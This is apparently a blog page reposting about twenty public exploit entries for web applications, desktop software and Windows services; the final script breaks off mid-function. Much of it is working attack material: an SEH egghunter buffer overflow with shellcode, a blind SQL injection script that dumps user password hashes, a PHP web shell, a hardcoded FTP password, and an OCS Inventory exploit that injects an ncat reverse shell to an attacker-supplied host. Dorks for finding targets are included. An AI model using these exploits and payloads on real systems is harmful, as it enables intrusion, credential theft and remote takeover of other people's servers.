All posts published by ISHACK AI BOT
-
Responsive Online Blog 1.0 - 'id' SQL Injection
# Exploit Title: Responsive Online Blog 1.0 - 'id' SQL Injection
# Date: 2020-06-23
# Exploit Author: Eren Şimşek
# Vendor Homepage: https://www.sourcecodester.com/php/14194/responsive-online-blog-website-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14194&title=Responsive+Online+Blog+Website+using+PHP%2FMySQL
# Version: v1.0
# Tested on: Linux - Wamp Server

> Vulnerable File
/category.php

> Vulnerable Code
$id=$_REQUEST['id'];
$query="SELECT * from blog_categories where id='".$id."'";

The id parameter enters the SQL query without any changes.

> Proof Of Concept
sqlmap 'http://localhost/resblog/category.php?id=1' --dbs --batch

OR

http://TARGET/resblog/category.php?id=1'
A single quote will cause an SQL error.
-
Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)
# Exploit Title: Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)
# Google Dork: N/A
# Date: 2020-06-20
# Exploit Author: BKpatron
# Vendor Homepage: https://www.campcodes.com/projects/php/4745/online-student-enrollment-system-in-php-mysqli/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/student_enrollment_1.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# my website: bkpatron.com

# Vulnerability:
This product is unprotected against CSRF vulnerabilities. The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. You can upload a PHP file here with CSRF.

# CSRF PoC (add student, File Upload):
<html>
<body>
<form enctype="multipart/form-data" method="POST" action="http://localhost/student_enrollment/admin/index.php?page=add-student">
  <label for="name">Student Name</label>
  <input name="name" type="text" id="name" value="" required=""><br/>
  <label for="roll">Student Roll</label>
  <input name="roll" type="text" value="" pattern="[0-9]{6}" id="roll" required=""><br/>
  <label for="address">Student Address</label>
  <input name="address" type="text" value="" id="address" required=""><br/>
  <label for="pcontact">Parant Contact NO</label>
  <input name="pcontact" type="text" id="pcontact" pattern="01[5|6|7|8|9][0-9]{8}" value="" placeholder="01........." required=""><br/>
  <label for="class">Student Class</label>
  <select name="class" class="form-control" id="class" required=""><br/>
    <option>Select</option>
    <option value="1st">1st</option>
    <option value="2nd">2nd</option>
    <option value="3rd">3rd</option>
    <option value="4th">4th</option>
    <option value="5th">5th</option>
  </select><br/>
  <label for="photo">Student Photo</label>
  <input name="photo" type="file" id="photo" required=""><br/>
  <input name="addstudent" value="Add Student" type="submit" class="btn btn-danger">
</form>
</body>
</html>

# HTTP Request:
http://localhost/student_enrollment/admin/index.php?page=add-student

POST /student_enrollment/admin/index.php?page=add-student HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1586330740172
Content-Length: 1669
Referer: http://localhost/exploit2.php
Cookie: _ga=GA1.1.1667382299.1577635358; PHPSESSID=2dhsgkdiavgfefp6g0qp63ruqe
Connection: keep-alive
Upgrade-Insecure-Requests: 1

-----------------------------1586330740172
Content-Disposition: form-data; name="name"

bkpatron
-----------------------------1586330740172
Content-Disposition: form-data; name="roll"

333000
-----------------------------1586330740172
Content-Disposition: form-data; name="address"

0000
-----------------------------1586330740172
Content-Disposition: form-data; name="pcontact"

01911111111
-----------------------------1586330740172
Content-Disposition: form-data; name="class"

1st
-----------------------------1586330740172
Content-Disposition: form-data; name="photo"; filename="up.php"
Content-Type: application/octet-stream

...

// uploaded file path:
http://localhost/student_enrollment/admin/images/your_file.php
-
Code Blocks 20.03 - Denial Of Service (PoC)
# Exploit Title: Code Blocks 20.03 - Denial Of Service (PoC)
# Vendor Homepage: http://www.codeblocks.org/
# Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/20.03/Windows/codeblocks-20.03-setup.exe/download
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-06-23
# Vulnerable Software: Code Blocks
# Version: 20.03
# Vulnerability Type: Denial of Service (DoS)
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)

# Steps to Produce the Crash:
# 1.- Run python code: CodeBlocksCrash.py
# 2.- Copy content to clipboard
# 3.- Open "codeblocks.exe"
# 4.- In the "Management" section on left hand side, Click on "FSymbols" tab.
# 5.- Select "Active project's symbols" from drop down "View:" menu.
# 6.- Paste ClipBoard into the "Search:" field.
# 7.- Press Enter from keyboard.
# 8.- Crashed.

##################################################################################################################################################

# Python "CodeBlocksCrash.py" Code:

# Write 5000 'A' bytes to a text file; pasting them into the Symbols search field crashes the application
f = open("CodeBlocksCrash.txt", "w")
payload = "\x41" * 5000
f.write(payload)
f.close()
-
BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting
# Exploit title: BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting
# Exploit Author: William Summerhill
# Date: 2020-06-22
# Vendor homepage: https://www.globalradar.com/
# Tested on: Windows
# CVE-2020-14943

# Description: The "Firstname" and "Lastname" parameters in Global RADAR BSA Radar 1.6.7234.X
# are vulnerable to a stored Cross-Site Scripting (XSS) via the Update User Profile feature
# (in the top-right of the application).

# Proof of Concept:
Using the "update user profile" feature in the top-right of the application while logged in, a malicious user can inject malicious, unencoded scripts, such as "<script>alert(1)</script>", into the Firstname and Lastname parameters of a user account. This stored XSS will execute on nearly every application page, as these parameters are always present while logged in.

This attack can be further leveraged by utilizing an existing authorization bypass exploit (CVE-2020-14944) to inject stored XSS payloads into these parameters for arbitrary existing user accounts.

Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14943
-
Lansweeper 7.2 - Incorrect Access Control
# Exploit Title: Lansweeper 7.2 - Incorrect Access Control
# SHODAN DORK : title:"Lansweeper - Login"
# Date: 2020-06-14
# Exploit Author: Amel BOUZIANE-LEBLOND
# Vendor Homepage: https://www.lansweeper.com/
# Software Link: https://www.lansweeper.com
# Version: 6.0.x through 7.2.x
# Tested on: Windows
# CVE : CVE-2020-14011

### Title: Incorrect Access Control.

### Category: Exploit

### Severity: Critical

### Description:
Lansweeper 6.0.x through 7.2.x has a default installation in which the admin password is configured for the admin account, unless "Built-in admin" is manually unchecked. This allows command execution via the Add New Package and Scheduled Deployments features.

### Other observation:
Hi,
This issue is kind of critical. By using Shodan with the filter title:"Lansweeper - Login" we will find some Lansweeper instances with the default installation on them.

### Details:
The Lansweeper application is agentless network inventory software that can be used for IT asset management. It uses the ASP.NET technology on its web application.

### Analysis:
When you install Lansweeper 6.0 or a more recent Lansweeper release and access the web console for the first time, you are presented with a First Run Wizard, which allows you to set up scanning and configure some basic options. Any subsequent times you access the console, you are presented with a login screen. By default, everyone in your network can access all of Lansweeper's features and menus simply by browsing to the web console URL and hitting the Built-in Admin button.

### Suggested mitigation:
Restrict access to the console and configure what users can see or do once they've been granted access. You assign a built-in or custom user role, a set of permissions, to user groups or individual user accounts. A user's role determines what the user can see or do within the console.

### Impact/Risk:
Remote code execution can expose the organization to unauthorized access of data and programs, and to fraud.

--
Amel BOUZIANE-LEBLOND
-
mySCADA myPRO 7 - Hardcoded Credentials
# Exploit Title: mySCADA myPRO v7 Hardcoded Credentials
# Date: 2018-07-02
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: http://myscada.org
# Software Link: https://www.myscada.org/mypro/
# Version: v7.0.45
# Tested on: Windows/Linux
# CVE-2018-11311
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11311
# https://github.com/EmreOvunc/mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password

# PoC
ftp [IP] 2121
username: myscada
password: Vikuk63
-
FHEM 6.0 - Local File Inclusion
# Exploit Title: FHEM 6.0 - Local File Inclusion
# Date: 2020-02-10
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: https://fhem.de/
# Software Link: https://fhem.de/#Download
# Version: v6.0
# Tested on: Windows
# Link: https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability

# PoC
To exploit the vulnerability, someone could use the request 'http://[HOST]/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text' to read information from the target by changing the "file" parameter.

GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
-
OpenEMR 5.0.1 - 'controller' Remote Code Execution
# Exploit Title: OpenEMR 5.0.1 - 'controller' Remote Code Execution
# Date: 2020-06-22
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://www.open-emr.org/wiki/index.php/OpenEMR_Downloads
# Version: v5.0.1
# Tested on: Linux
# Link: https://github.com/EmreOvunc/OpenEMR_Vulnerabilities

# PoC
To exploit the vulnerability, someone could send the following POST request to 'http://[HOST]/controller.php?document&upload&patient_id=00&parent_id=4&' to upload malicious PHP code.

POST /openemr-5.0.1/controller.php?document&upload&patient_id=00&parent_id=4& HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.155.140/openemr-5.0.1/controller.php?document&upload&patient_id=00&parent_id=4&
Content-Type: multipart/form-data; boundary=---------------------------141194333536146869123947219434
Content-Length: 842
Origin: http://172.16.155.140
DNT: 1
Connection: close
Cookie: OpenEMR=t1lugo5qrbhv7mc2c3q9ricsnl; TreeMenuBranchStatus=objTreeMenu_1_node_1_9; PHPSESSID=dfhapc4v0bskt7pcpmc2j93agq; LS-VQGNEIWNPEBSNBWE=6rm848pgjj78hhecpb9roo8af1; YII_CSRF_TOKEN=OWYyM0lybGFtRF9wcHRkZ1lldF9WblhoVHlVNk5HRW3WMnZhghJHNtBjyIuALM94Ww3gltGLoeKETBSfevfbCw%3D%3D
Upgrade-Insecure-Requests: 1

-----------------------------141194333536146869123947219434
Content-Disposition: form-data; name="MAX_FILE_SIZE"

64000000
-----------------------------141194333536146869123947219434
Content-Disposition: form-data; name="file[]"; filename="shell_info.php"
Content-Type: text/php

<?php phpinfo(); ?>
-----------------------------141194333536146869123947219434
Content-Disposition: form-data; name="destination"


-----------------------------141194333536146869123947219434
Content-Disposition: form-data; name="patient_id"

00
-----------------------------141194333536146869123947219434
Content-Disposition: form-data; name="category_id"

4
-----------------------------141194333536146869123947219434
Content-Disposition: form-data; name="process"

true
-----------------------------141194333536146869123947219434--
-
Windscribe 1.83 - 'WindscribeService' Unquoted Service Path
# Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path
# Date: 2020-06-26
# Exploit Author: Ethan Seow
# Vendor Homepage: https://windscribe.com
# Version: v1.83 Build 20
# Tested on: Microsoft Windows 10 Home 10.0.18363 Build 18363

#filename : exploit.bat
#Code start
@echo off
sc config WindscribeService binPath="cmd /k {PATH TO REVERSE SHELL e.g. C:\Users\Public\payload.exe}"
sc stop WindscribeService
sc start WindscribeService
echo Exploit success! SYSTEM reverse shell should be triggered :DDDDD
pause
#Code end
-
Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting
# Exploit Title: Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2020-06-28
# Exploit Author: Anushree Priyadarshini
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
# Tested on: Windows 10
# CVE: CVE-2020-15599

Description:
The form parameters 'user_firstname' and 'user_lastname' are vulnerable to stored cross site scripting.

Payload for 'user_firstname' : <script>alert(1)</script>
Payload for 'user_lastname' : <script>alert(2)</script>

POST /CMSsite-master/register.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9,en-GB;q=0.8,en-CA;q=0.7,zh-CN;q=0.6,zh-HK;q=0.5,zh-SG;q=0.4,zh-TW;q=0.3,ja;q=0.2,ko;q=0.1
Accept-Encoding: gzip, deflate
Referer: http://localhost/CMSsite-master/register.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 190
Connection: close
Cookie: PHPSESSID=491d4jir62vldd0u84knd1m1fi
Upgrade-Insecure-Requests: 1

user_name=DemoUser&user_firstname=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&user_lastname=%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E&user_email=Hack%40gmail.com&user_password=1234&register=
-
KiteService 1.2020.618.0 - Unquoted Service Path
# Exploit Title: KiteService 1.2020.618.0 - Unquoted Service Path
# Discovery by: PoisonSk
# Discovery Date: 2020-06-23
# Vendor Homepage: https://www.kite.com/
# Software Link : https://www.kite.com/download/
# Tested Version: 1.2020.618.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Home Single 10.0.18363 N/D Compilación 18363

# Steps to discover unquoted Service Path:

C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i "program " | findstr /i /v """
KiteService    KiteService    C:\Program Files\Kite\KiteService.exe    Auto

C:\Users>sc qc KiteService
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: KiteService
        TIPO                  : 10  WIN32_OWN_PROCESS
        TIPO_INICIO           : 2   AUTO_START
        CONTROL_ERROR         : 0   IGNORE
        NOMBRE_RUTA_BINARIO   : C:\Program Files\Kite\KiteService.exe
        GRUPO_ORDEN_CARGA     :
        ETIQUETA              : 0
        NOMBRE_MOSTRAR        : KiteService
        DEPENDENCIAS          :
        NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit:
# A successful attempt would require the local attacker to insert an executable file in the path of the service.
# Upon service restart or system reboot, the malicious code will be run with elevated privileges.
-
Reside Property Management 3.0 - 'profile' SQL Injection
# Exploit Title: Reside Property Management 3.0 - 'profile' SQL Injection
# Date: 2020-06-28
# Google Dork: "Copyright 2020 Reside Property Management"
# Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari)
# Team Members: Behzad Khalifeh , Milad Ranjbar
# Vendor Homepage: https://www.13plugins.com/product/reside-v3-rental-property-management-php-script/
# Version: v3.0 [Final Version]
# Tested on: Windows/Linux
# CVE: N/A

.:: Description ::.
RESIDE makes it easy to manage all of your tenants & properties, record payments, and keep everything accessible any time, from any computer or device.

.:: Vulnerable File ::.
profile.php

.:: Vulnerable Code ::.
- Line 21: $profile = $_GET['profile'];
- Line 22: $adminsName = preg_replace('/-/', ' ', $profile);
- Line 90: $sql = "SELECT * FROM admins WHERE adminName = '" . $adminsName . "'";
- Line 91: $result = mysqli_query($mysqli, $sql) or die ('-1' . mysqli_error());

.:: Proof Of Concept (PoC) ::.
Step 1 - Find your target with the above Dork.
Step 2 - Find the profile.php file on the target.
Step 3 - Inject your payloads in the profile parameter.

.:: Sample Request ::.
localhost/reside-rental-property-management/Reside/profile.php?profile=-21%27+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,user(),24,25,26%23
-
e-learning Php Script 0.1.0 - 'search' SQL Injection
# Exploit Title: e-learning Php Script 0.1.0 - 'search' SQL Injection
# Date: 2020-06-29
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage: https://github.com/amitkolloldey/elearning-script
# Software Link: https://github.com/amitkolloldey/elearning-script
# Version: 0.1.0
# Tested on: Kali Linux

Source code (search.php):

<?php
if(isset($_GET['search_submit'])){
    $search_key = $_GET['search'];
    $search = "select * from posts where post_keywords like '%$search_key%'";
    $run_search = mysqli_query($con,$search);
    $count = mysqli_num_rows($run_search);
    if($count == 0){
        echo "<h2>No Result Found.Please Try With Another Keywords.</h2>";
    }else{
        while($search_row = mysqli_fetch_array($run_search)):
            $post_id = $search_row ['post_id'];
            $post_title = $search_row ['post_title'];
            $post_date = $search_row ['post_date'];
            $post_author = $search_row ['post_author'];
            $post_featured_image = $search_row ['post_image'];
            $post_keywords = $search_row ['post_keywords'];
            $post_content = substr($search_row ['post_content'],0,200);
?>

Payload:

http://127.0.0.1/e/search.php?search=a&search_submit=Search

http://127.0.0.1/e/search.php?search=a'OR (SELECT 3475 FROM(SELECT COUNT(*),CONCAT(0x716b787171,(SELECT (ELT(3475=3475,1))),0x7171787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IsDG&search_submit=Search
-
RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)
# Exploit Title: RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-06-29
# Vulnerable Software: RM Downloader
# Software Link Download: https://github.com/x00x00x00x00/RMDownloader_2.50.60/raw/master/RMDownloader.exe
# Version: 2.50.60 2006.06.23
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)

# Proof of Concept:
# 1.- Run the python script, it will create a new file "RM_LCE.txt"
# 2.- Copy the content of the new file 'RM_LCE.txt' to clipboard
# 3.- Turn off DEP for RMDownloader.exe
# 4.- Open 'RMDownloader.exe'
# 5.- Go to 'Load' tab
# 6.- Paste clipboard in 'Load' parameter
# 7.- Click on button 'OK'
# 8.- Two messageboxes will pop up, click OK
# 9.- Calc.exe runs.

#################################################################################################################################################

# Python "RM_LCE.py" Code:

f = open("RM_LCE.txt", "w")

junk = "\x41" * 336
egg = "w00tw00t"

# msfvenom -p windows/exec cmd=calc.exe --platform windows -f py -b "\x0a\x0d\x00"
buf = ""
buf += "\xd9\xeb\xb8\xfa\x38\xad\x4f\xd9\x74\x24\xf4\x5a\x29"
buf += "\xc9\xb1\x31\x83\xc2\x04\x31\x42\x14\x03\x42\xee\xda"
buf += "\x58\xb3\xe6\x99\xa3\x4c\xf6\xfd\x2a\xa9\xc7\x3d\x48"
buf += "\xb9\x77\x8e\x1a\xef\x7b\x65\x4e\x04\x08\x0b\x47\x2b"
buf += "\xb9\xa6\xb1\x02\x3a\x9a\x82\x05\xb8\xe1\xd6\xe5\x81"
buf += "\x29\x2b\xe7\xc6\x54\xc6\xb5\x9f\x13\x75\x2a\x94\x6e"
buf += "\x46\xc1\xe6\x7f\xce\x36\xbe\x7e\xff\xe8\xb5\xd8\xdf"
buf += "\x0b\x1a\x51\x56\x14\x7f\x5c\x20\xaf\x4b\x2a\xb3\x79"
buf += "\x82\xd3\x18\x44\x2b\x26\x60\x80\x8b\xd9\x17\xf8\xe8"
buf += "\x64\x20\x3f\x93\xb2\xa5\xa4\x33\x30\x1d\x01\xc2\x95"
buf += "\xf8\xc2\xc8\x52\x8e\x8d\xcc\x65\x43\xa6\xe8\xee\x62"
buf += "\x69\x79\xb4\x40\xad\x22\x6e\xe8\xf4\x8e\xc1\x15\xe6"
buf += "\x71\xbd\xb3\x6c\x9f\xaa\xc9\x2e\xf5\x2d\x5f\x55\xbb"
buf += "\x2e\x5f\x56\xeb\x46\x6e\xdd\x64\x10\x6f\x34\xc1\xee"
buf += "\x25\x15\x63\x67\xe0\xcf\x36\xea\x13\x3a\x74\x13\x90"
buf += "\xcf\x04\xe0\x88\xa5\x01\xac\x0e\x55\x7b\xbd\xfa\x59"
buf += "\x28\xbe\x2e\x3a\xaf\x2c\xb2\x93\x4a\xd5\x51\xec"

# Short jump over the SEH record into the nops/egghunter
nseh = "\xeb\x06\x90\x90"

#1002C531 5B POP EBX
#1002C532 58 POP EAX
#1002C533 C3 RETN
#C:\Program Files\RM Downloader\RDutility02.dll
seh = "\x31\xc5\x02\x10"

nops = "\x90" * 20

egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
egghunter += "\x77\x30\x30\x74"  # this is the marker/tag: w00t
egghunter += "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"

payload = junk + egg + buf + nseh + seh + nops + egghunter

f.write(payload)
f.close()
-
PHP-Fusion 9.03.60 - PHP Object Injection
# Exploit Title: PHP-Fusion 9.03.60 - PHP Object Injection
# Date: 2020-05-26
# Exploit Author: coiffeur
# Vendor Homepage: https://www.php-fusion.co.uk/home.php
# Software Link: https://www.php-fusion.co.uk/php_fusion_9_downloads.php
# Version: v9.03.60
# Description:
# PHP Object Injection to SQL injection (pre-auth)

import sys
import requests
import subprocess

GENERATOR_NAME = "gen.php"
GENERATOR_CONTENT = """<?php
if (count($argv) < 2) {
    echo 'Usage: php gen.php "<PAYLOAD>"';
    die;
}
$ar["comment_item_id"] = "1";
$ar["comment_item_type"] = $argv[1];
$payload = urlencode(base64_encode(serialize($ar)));
echo $payload;
?>
"""

DEBUG = 1
DELTA = None
TRESHOLD = 0.60
LIKE = "f%admin"
COLUMNS = ["user_id", "user_name", "user_algo", "user_salt", "user_password",
           "user_admin_algo", "user_admin_salt", "user_admin_password", "user_email"]


def usage():
    banner = """NAME:
    PHPFusion v9.03.50, PHP Object Injection to SQL injection
SYNOPSIS:
    python poi_to_sqli_9.03.50.py <URL>
DESCRIPTION:
    Dump the content of the table named fusionX...X_users
AUTHOR:
    coiffeur
"""
    print(banner)


def generator(action):
    # "w" writes the PHP serializer helper to disk, "r" removes it again
    if action == "w":
        with open(GENERATOR_NAME, "w") as f:
            f.write(GENERATOR_CONTENT)
    if action == "r":
        _ = subprocess.Popen(["rm", GENERATOR_NAME], stdout=subprocess.PIPE)


def generate_payload(text):
    # Serialize the comment options array with PHP so the injected text lands in comment_item_type
    p = subprocess.Popen(["php", GENERATOR_NAME, text], stdout=subprocess.PIPE)
    out, _ = p.communicate()
    return out


def check(payload):
    # Time-based oracle: returns the server response time for the given payload
    datas = {"comment_options": generate_payload(payload)}
    r = requests.post(
        url=f"{sys.argv[1]}/includes/classes/PHPFusion/Feedback/Comments.ajax.php",
        data=datas)
    return r.elapsed.total_seconds()


def evaluate_delay():
    global DELTA
    deltas = []
    payload = "' UNION SELECT SLEEP(2)-- - '"
    for _ in range(3):
        deltas.append(check(payload))
    DELTA = sum(deltas)/len(deltas)


def get_tbl_name_len():
    i = 0
    while 1:
        payload = f"' UNION SELECT (CASE WHEN (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_name LIKE '{LIKE}' )<{i} THEN SLEEP(2) ELSE 0 END) -- - '"
        if check(payload) >= DELTA*TRESHOLD:
            return i-1
        if i > 100:
            print(f"[x] Exploit failed")
            exit(-1)
        i += 1


def get_tbl_name(length):
    tbl_name = ""
    for i in range(1, length+1):
        min, max = 0, 127-1
        while min < max:
            mid = (max + min) // 2
            payload = f"' UNION SELECT (CASE WHEN (SELECT ASCII(SUBSTR(table_name,{i},1)) FROM information_schema.tables WHERE table_name LIKE '{LIKE}' )<={mid} THEN SLEEP(2) ELSE 0 END) -- - '"
            if check(payload) >= DELTA*TRESHOLD:
                max = mid
            else:
                min = mid + 1
        tbl_name += chr(min)
        if DEBUG:
            print(f"[DEBUG] Table name: {tbl_name}")
    return tbl_name


def get_rows_number(tbl_name):
    i = 0
    while 1:
        payload = f"' UNION SELECT (CASE WHEN (SELECT COUNT(user_name) FROM {tbl_name})>{i} THEN 0 ELSE SLEEP(2) END) -- - '"
        if check(payload) >= DELTA*TRESHOLD:
            return i
        i += 1


def get_elt_len(tbl_name, column_name, offset):
    i = 0
    while 1:
        payload = f"' UNION SELECT (CASE WHEN (SELECT LENGTH({column_name}) FROM {tbl_name} LIMIT 1 OFFSET {offset})<{i} THEN SLEEP(2) ELSE 0 END) -- - '"
        if check(payload) >= DELTA*TRESHOLD:
            if DEBUG:
                print(f"[DEBUG] Element {offset} in {column_name} from {tbl_name} length: {i-1}")
            return i-1
        i += 1


def get_elt(tbl_name, column_name, offset, length):
    elt = ""
    for i in range(1, length+1):
        min, max = 0, 127-1
        while min < max:
            mid = (max + min) // 2
            payload = f"' UNION SELECT (CASE WHEN (SELECT ASCII(SUBSTR({column_name},{i},1)) FROM {tbl_name} LIMIT 1 OFFSET {offset} )<={mid} THEN SLEEP(2) ELSE 0 END) -- - '"
            if check(payload) >= DELTA*TRESHOLD:
                max = mid
            else:
                min = mid + 1
        elt += chr(min)
        if DEBUG:
            print(f"[DEBUG] Element {offset} in {column_name} from {tbl_name}: {elt}")
    print(f"[*] Element {offset} in {column_name} from {tbl_name}: {elt}")
    return elt


def get_rows(tbl_name, row_number):
    print(f"[*] Trying to dump {tbl_name}")
    rows = []
    for offset in range(row_number):
        row = []
        for column_name in COLUMNS:
            elt_length = get_elt_len(tbl_name, column_name, offset)
            row.append(get_elt(tbl_name, column_name, offset, elt_length))
        print(f"[*] Row {offset}: {row}")
        rows.append(row)
    print(f"[*] Rows: {rows}")


def main():
    if len(sys.argv) < 2:
        usage()
        exit(-1)
    if DEBUG:
        print(f"[*] Target: {sys.argv[1]}")
    if DEBUG:
        print(f"[DEBUG] Writing generator to {GENERATOR_NAME}")
    generator("w")
    evaluate_delay()
    if DEBUG:
        print(f"[*] Delta: {DELTA}")
    tbl_name_len = get_tbl_name_len()
    if DEBUG:
        print(f"[DEBUG] Looking for table like {LIKE} with length {tbl_name_len}")
    tbl_name = get_tbl_name(tbl_name_len)
    print(f" Table name: {tbl_name}")
    prefix = f"{tbl_name.split('_')[0]}_"
    print(f"[*] Prefix: {prefix}")
    user_table_name = f"{prefix}users"
    number_of_rows = get_rows_number(user_table_name)
    if DEBUG:
        print(f"[*] {user_table_name} got {number_of_rows} rows")
    get_rows(user_table_name, number_of_rows)
    if DEBUG:
        print(f"[DEBUG] Removing {GENERATOR_NAME}")
    generator("r")


if __name__ == "__main__":
    main()
-
Online Shopping Portal 3.1 - Authentication Bypass
# Exploit Title: Online Shopping Portal 3.1 - Authentication Bypass
# Date: 2020-06-25
# Exploit Author: Ümit Yalçın
# Vendor Homepage: https://phpgurukul.com/shopping-portal-free-download/
# Version: 3.1
# Tested on: Windows 10 / WampServer

1- Authentication Bypass

Go to the following url!
http://localhost/shopping/admin/

The default admin username is admin; to bypass authentication use an SQL bypass like '# or ' OR 1=1#

username = admin'#
password = whatever you want

2- Uploading Shell to Remote Code Execution

After bypassing the authentication, go to the insert-product field
http://localhost/shopping/admin/insert-product.php

after that, upload your shell, as an example

<?php $exe = shell_exec($_REQUEST['cmd']); echo $exe; ?>

and go to http://localhost/shopping/admin/productimages/ and all possible folders named with a number from 1, like

http://localhost/shopping/admin/productimages/1
http://localhost/shopping/admin/productimages/2
http://localhost/shopping/admin/productimages/3
http://localhost/shopping/admin/productimages/4
http://localhost/shopping/admin/productimages/5

When you find your shell, for example if you found it at 21:

TARGET/shopping/admin/productimages/21/shell.php?cmd=CODE_YOU_WANT_TO_EXECUTE
-
OCS Inventory NG 2.7 - Remote Code Execution
# Exploit Title: OCS Inventory NG 2.7 - Remote Code Execution
# Date: 2020-06-05
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2020-14947
# Vendor Homepage: https://ocsinventory-ng.org/
# Version: v2.7
# Tested on: Ubuntu 18.04 / PHP 7.2.24

#!/usr/bin/python3

import requests
import sys
import warnings
import random
import string
from bs4 import BeautifulSoup
from urllib.parse import quote

warnings.filterwarnings("ignore", category=UserWarning, module='bs4')

if len(sys.argv) != 6:
    print("[~] Usage : ./ocsng-exploit.py url username password ip port")
    exit()

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]

request = requests.session()


def login():
    login_info = {
        "Valid_CNX": "Send",
        "LOGIN": username,
        "PASSWD": password
    }
    login_request = request.post(url+"/index.php", login_info)
    login_text = login_request.text
    if "User not registered" in login_text:
        return False
    else:
        return True


def inject_payload():
    csrf_req = request.get(url+"/index.php?function=admin_conf")
    content = csrf_req.text
    soup = BeautifulSoup(content, "lxml")
    first_token = soup.find_all("input", id="CSRF_10")[0].get("value")
    print("[+] 1st token : %s" % first_token)
    first_data = {
        "CSRF_10": first_token,
        "onglet": "SNMP",
        "old_onglet": "INVENTORY"
    }
    req = request.post(url+"/index.php?function=admin_conf", data=first_data)
    content2 = req.text
    soup2 = BeautifulSoup(content2, "lxml")
    second_token = soup2.find_all("input", id="CSRF_14")[0].get("value")
    print("[+] 2nd token : %s" % second_token)
    payload = "; ncat -e /bin/bash %s %s #" % (ip, port)
    #RELOAD_CONF=&Valid=Update
    inject_request = {
        "CSRF_14": second_token,
        "onglet": "SNMP",
        "old_onglet": "SNMP",
        "SNMP": "0",
        "SNMP_INVENTORY_DIFF": "1",
        # The payload should be here
        "SNMP_MIB_DIRECTORY": payload,
        "RELOAD_CONF": "",
        "Valid": "Update"
    }
    final_req = request.post(url+"/index.php?function=admin_conf", data=inject_request)
    if "Update done" in final_req.text:
        print("[+] Payload injected successfully")
        execute_payload()


def execute_payload():
    csrf_req = request.get(url+"/index.php?function=SNMP_config")
    content = csrf_req.text
    soup = BeautifulSoup(content, "lxml")
    third_token = soup.find_all("input", id="CSRF_22")[0].get("value")
